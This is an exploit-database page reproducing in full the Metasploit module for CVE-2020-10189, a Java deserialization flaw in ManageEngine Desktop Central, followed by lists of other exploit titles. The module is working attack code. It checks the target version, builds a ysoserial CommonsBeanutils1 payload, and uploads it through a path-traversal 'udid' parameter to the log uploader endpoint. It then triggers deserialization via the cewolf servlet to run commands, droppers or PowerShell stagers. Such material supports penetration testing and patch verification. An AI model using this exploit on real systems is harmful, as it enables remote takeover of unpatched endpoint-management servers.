Menu

Search for hundreds of thousands of exploits

"ManageEngine Desktop Central - Java Deserialization (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-03-17

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'             => 'ManageEngine Desktop Central Java Deserialization',
      'Description'      => %q{
        This module exploits a Java deserialization vulnerability in the
        getChartImage() method from the FileStorage class within ManageEngine
        Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.

        "The short-term fix for the arbitrary file upload vulnerability was
        released in build 10.0.474 on January 20, 2020. In continuation of that,
        the complete fix for the remote code execution vulnerability is now
        available in build 10.0.479."
      },
      'Author'           => [
        'mr_me', # Discovery and exploit
        'wvu'    # Module
      ],
      'References'       => [
        ['CVE', '2020-10189'],
        ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
        ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
        ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
        ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
      ],
      'DisclosureDate'   => '2020-03-05', # 0day release
      'License'          => MSF_LICENSE,
      'Platform'         => 'windows',
      'Arch'             => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged'       => true,
      'Targets'          => [
        ['Windows Command',
          'Arch'         => ARCH_CMD,
          'Type'         => :win_cmd
        ],
        ['Windows Dropper',
          'Arch'         => [ARCH_X86, ARCH_X64],
          'Type'         => :win_dropper
        ],
        ['PowerShell Stager',
          'Arch'         => [ARCH_X86, ARCH_X64],
          'Type'         => :psh_stager
        ]
      ],
      'DefaultTarget'    => 2,
      'DefaultOptions'   => {
        'RPORT'          => 8383,
        'SSL'            => true,
        'WfsDelay'       => 60 # It can take a little while to trigger
      },
      'CmdStagerFlavor'  => 'certutil', # This works without issue
      'Notes'            => {
        'PatchedVersion' => Gem::Version.new('100474'),
        'Stability'      => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?
        'Reliability'    => [FIRST_ATTEMPT_FAIL],    # Payload upload may fail
        'SideEffects'    => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'configurations.do')
    )

    unless res
      return CheckCode::Unknown('Target is not responding to check')
    end

    unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')
      return CheckCode::Unknown('Target is not running Desktop Central')
    end

    version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text

    unless version
      return CheckCode::Detected('Could not detect Desktop Central version')
    end

    vprint_status("Detected Desktop Central version #{version}")

    if Gem::Version.new(version) < notes['PatchedVersion']
      return CheckCode::Appears("#{version} is an exploitable version")
    end

    CheckCode::Safe("#{version} is not an exploitable version")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :win_cmd
      execute_command(payload.encoded)
    when :win_dropper
      execute_cmdstager
    when :psh_stager
      execute_command(cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      ))
    end
  end

  def execute_command(cmd, _opts = {})
    # XXX: An executable is required to run arbitrary commands
    cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper

    vprint_status("Serializing command: #{cmd}")

    # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
    serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(
      'CommonsBeanutils1',
      cmd
    )

    # XXX: Patch in expected serialVersionUID
    serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"

    # Rock 'n' roll!
    upload_serialized_payload(serialized_payload)
    deserialize_payload
  end

  def upload_serialized_payload(serialized_payload)
    print_status('Uploading serialized payload')

    res = send_request_cgi(
      'method'     => 'POST',
      'uri'        => normalize_uri(target_uri.path,
                                    '/mdm/client/v1/mdmLogUploader'),
      'ctype'      => 'application/octet-stream',
      'vars_get'   => {
        'udid'     => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
        'filename' => 'logger.zip'
      },
      'data'       => serialized_payload
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')
    end

    print_good('Successfully uploaded serialized payload')

    # C:\Program Files\DesktopCentral_Server\bin
    register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
  end

  def deserialize_payload
    print_status('Deserializing payload')

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'cewolf/'),
      'vars_get' => {'img' => '\\logger.zip'}
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')
    end

    print_good('Successfully deserialized payload')
  end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2020-05-25 "Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)" remote hardware Metasploit
2020-05-25 "Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)" remote windows Metasploit
2020-05-22 "WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)" remote multiple Metasploit
2020-05-19 "Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)" remote php Metasploit
2020-05-01 "Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)" remote multiple Metasploit
2020-04-28 "Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)" local windows Metasploit
2020-04-20 "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)" remote linux Metasploit
2020-04-17 "Nexus Repository Manager - Java EL Injection RCE (Metasploit)" remote linux Metasploit
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-04-16 "Apache Solr - Remote Code Execution via Velocity Template (Metasploit)" remote multiple Metasploit
2020-04-16 "PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)" remote php Metasploit
2020-04-16 "TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)" remote linux_mips Metasploit
2020-04-16 "Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)" remote java Metasploit
2020-04-16 "DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2020-04-16 "ThinkPHP - Multiple PHP Injection RCEs (Metasploit)" remote linux Metasploit
2020-04-16 "Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "SharePoint Workflows - XOML Injection (Metasploit)" remote windows Metasploit
2020-03-31 "DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)" remote hardware Metasploit
2020-03-31 "Redis - Replication Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)" remote multiple Metasploit
2020-03-17 "Rconfig 3.x - Chained Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-17 "ManageEngine Desktop Central - Java Deserialization (Metasploit)" remote multiple Metasploit
2020-03-10 "PHPStudy - Backdoor Remote Code execution (Metasploit)" remote php Metasploit
2020-03-10 "Nagios XI - Authenticated Remote Command Execution (Metasploit)" remote linux Metasploit
2020-03-09 "PHP-FPM - Underflow Remote Code Execution (Metasploit)" remote php Metasploit
2020-03-09 "Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)" remote windows Metasploit
2020-03-09 "Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)" remote multiple Metasploit
2020-03-09 "OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)" local linux Metasploit
2020-03-09 "Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)" remote multiple Metasploit
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.